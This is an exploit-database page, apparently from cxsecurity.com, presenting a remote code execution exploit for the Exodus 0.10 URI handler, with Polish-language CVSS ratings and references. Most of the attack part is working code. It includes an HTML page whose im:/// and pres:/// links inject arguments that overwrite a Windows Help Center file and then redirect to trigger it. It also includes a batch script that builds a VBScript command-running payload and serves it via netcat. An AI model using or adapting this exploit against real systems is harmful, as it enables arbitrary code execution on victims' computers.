Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit

2009-08-12 / 2009-08-13
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

<!-- Exodus v0.10 remote code execution exploit by Nine:Situations:Group::strawdog This uses the "-l" argument to overwrite a file inside Microsoft Help and Support Center folders (oh rgod...) Firstly run netcat in listen mode to drop the vbscript shell run this script: @echo off rem dropsh.cmd echo ^<SCRIPT LANGUAGE="VBScript"^> > testfile echo Dim wshShell >> testfile echo Set wshShell = CreateObject("WScript.Shell") >> testfile echo wshShell.Run("cmd /c start calc") >> testfile echo ^</SCRIPT^> >> testfile nc -L -s 192.168.0.1 -p 5222 -vv < testfile --> <html> <head> <script type="text/javascript"> <!-- function doRedirect() { location.href = "hcp://system/sysinfo/msinfo.htm"; } function runcalc() { window.setTimeout("doRedirect()", 10000); } //--> </script> <a href="im:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a><br> <a href="pres:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a> </html>

Referencje:

http://www.milw0rm.com/exploits/7167
http://secunia.com/advisories/32729


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top